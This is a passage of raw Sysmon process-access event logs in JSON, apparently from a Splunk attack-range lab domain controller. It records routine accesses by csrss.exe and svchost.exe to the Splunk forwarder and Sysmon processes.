Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01D1-5F25-0000-00105F1D0400}\r\nTargetProcessId: 3340\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01D1-5F25-0000-00105F1D0400}","TargetProcessId":"3340","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
